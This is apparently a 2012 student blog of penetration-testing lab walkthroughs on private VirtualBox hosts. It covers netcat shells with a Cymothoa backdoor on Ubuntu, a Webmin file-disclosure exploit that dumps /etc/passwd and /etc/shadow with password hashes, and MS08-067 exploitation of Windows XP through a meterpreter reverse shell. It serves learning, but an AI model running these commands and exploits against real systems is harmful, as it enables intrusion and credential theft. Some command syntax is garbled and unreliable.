Tuesday, January 31, 2012

Backdooring Backtrack to Ubuntu

In this case is situatuation we have access to setup backdoor to victim, I type
nc -l -v -p 8888 -e > cy /bin/bash
in Backtrack terminal with position at
root@bt:/pentest/backdoors/cymothoa#
And move to terminal victim target and type
:~$ nc 192.168.56.1 8888 -e > cy /bin/bash
and look what happend in backtrack console

Position backtrack has listening and connect to victim
and I move to victim console
I type ls to look list at this directory and I execute cymothoa file with command ./cymothoa
I have running cymothoa in victim terminal, I suppose I can to next treat to setup backdoor at this console, and this is my opinion.


After enterance in cymothoa I type
ps -axu
to look prosess running

And runing cymothoa with syntax
./cymothoa -p (process ID of bash shell) -s 0 (option for bash shell) -y (port in listing on backtrack)
./cymothoa -p 20575 -s 0 -y 8888
Already infected on shell prosess.

But I still confused with this condition, I suppose this is backtrack infected by Uubuntu!? or Ubuntu already infected by BacktrackCymothoa!?

Crack Password with John The Ripper

After we found hash password we must to crack it for look real password, at this time I wanna try to crack password from past case

I use John The Ripper
After open john, I choose to copy file with name userpass (txt) to john's folder cause in article said is can increase time when crack password, the I crack this password like this
After I wait for crack file is not have result and I think this is too long hash so I decided to use one hash to be cracked with john the ripper
I wait for long time not have result, and I choose to aborted the treat, cause I this this not have password matched in dictionary list of password.

Exploitation to Previlege Escalation

Information Gathering 

Zenmap to look up service and port has open or run

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.021 days (since Mon Jan 30 17:27:33 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=209 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 00:58:10 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 17:58
Completed NSE at 17:58, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.16 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)

From that I suppose that web application is running so I check to that IP in my browser and I found Web page it that server is active, so I want to penetrate this server with anything from web

Vulnerability Assesment and Indentification

Then the Nessus Vulnerability Scanning
Given the level of vulnerability on the target and see more details of services running
Following up on port 10000 on the web application
Results of Nessus Webmin application states has a gap

Exploitation

Metasploit
msf > search webmin

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure

msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > set LPORT 10000
LPORT => 10000
msf auxiliary(file_disclosure) > set LHOST 192.168.0.27
LHOST => 192.168.0.27
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

After seeing the contents of / etc / passwd I have not managed to get my password and user should try to use the exploit-DB by searching for keywords Webmin which I suspect has a gap

I tried with the way the exploit Exploit-BD


root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

Now I managed to go in and open a shadow file in / etc / shadow in server target, and to next step we need to treat crack password from that hash password





Saturday, January 28, 2012

Metasploit With The Systematic Hacking Step

This articel is for addjusment Articel about Metasploit


Information Gathering :


Use Zenmap to identification specification data of target.

Result of scanning is :




Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.06 ms 192.168.56.100

Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat:
|   NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
|   Names
|     XXX-8ADCB030A79<00>  Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     XXX-8ADCB030A79<20>  Flags: <unique><active>
|_    WORKGROUP<1e>        Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.56.102



In Zenmap result we can look indentification of Target specify.
Important informasion is :


Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3

For next step is


Service Enumeration :

Result of Zenmap is 

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds



We can look service running on target system.


And next is 

Vulnerability Assessment and Identification :

I use Nessus to identification Vulnerability of target


result of nessus is


We can look 2 point of vulnerability has found, and I try to expose it
I found so interest vulnerability here, I want to try exploit it to target in Metaploit


Exploitation :


I use Metasploit Console to exploit target, open terminal and type : msfconsole

And next step is matched vulnerability Assesment and Identification data from Nessus to use in Metasploit, previous I had found most interest vulnerability is MS08-067
And try to Meterpreter step to use exploit MS08-067 with command  
use exploit/windows/smb/ms08_067_netapi
 After choose exploit we need to set payload with command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST
LHOST is My IP
RHOST is Target IP
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and  type exploit to start exploitation target

After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
 
meterpreter > execute -M -f cmd.exe
This command mean we make system execute command prompth on system (XP) and afte that we enter to system32 target
And Finally I success to enter system of XP with meterpreter Metasploit.

Use Offline Database Exploit on Exploit-db

Use Exploit-DB at Bactrack is offline weapon of exploit in local database, Bactrack Tools > Exploitation Tools > Open Source Exploitation > Exploit-DB > Exploit-BD Search
To search exploit we can use ./searchploit <name exploit>
For example I want to find out about smb exploit
./searcploit smb
I can found so many exploit for smb, for use it we need to match vulnerability target with nessus, from Nessus article, to Open exploit, we can look extension exploit, if py its mean that file base writen with python and we can use syntax python <name exploit> for rb its mean ruby file, C is base writen on C we need to compile that script exploit, if that pl its mean writen with perl and use perl <name file exploit>

We can open exploit file with command "cat"
I'll try one of that file for example
and result of that is
That exploit is for VLC media player, we can use it if target have same match vulnerability.

Vulnerability Report on Nessus

First I was scanning network in class with name test1
Click on Test1 and press "Browse" and we'll see detail of target scanning

We can see how much point of vulnerability of target, click on IP for see more detail
And we can download detail of result with option "download report", choose type of page saved, I choose "detail HTML report" and this is report of that page in this link : Nessus Report

Metasploit on Backtrack 5

Now I'll try to use metasploit console to exploitation windows XP sp 3 on Virtualbox, f irst we need to know information about victim, in penetration testing know as Informaton Gathering, we can use nmap, Zenmap or ect to scanning candidate victim on network.

Scanning Network
 We can know any user active on network with IP 192.168.56.102 and after get IP we need to scanning vulnerability target, now I use Nessus
After open Nessus fill Name Target, Policy, and fill Scan Target with IP's victim
Press scan and wait till finish result
We can see vulnerability of victim is have 2 high risk vulnerability, press on port 445 and look deeply information like this
I look 2 vulnerability and choose a 2nd plugin I have, I was try to exploit first option and fail exploitation it, and I choose 2nd option this is
Plugin name is MS08-067, I try to find information about that plugin vulnerability on google and find at metaploit payload description, and try to explit it, and next open metaploit console with command on terminal #msfconsole
Use exploit match with nessus result and syntax in metasploit is
use exploit/windows/smb/ms08_067_netapi
 After choose exploit we need to set payload with syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After set Payload we need to determine Local Host and target use syntax
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and execute Exploit with syntax
exploit
To enter meterpreter mode
 
After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
 
meterpreter > execute -M -f cmd.exe
This command mean we make system execute command prompth on system (XP) and afte that we enter to system32 target
For prove we have taken over our system proved to create a folder in C:\
Use command mkdir is2c in C:\> to make folder on C:\
  And success to make folder in C:\ that mean we has take over XP system.

 
IS2C © 2012 Blog's Student | is2c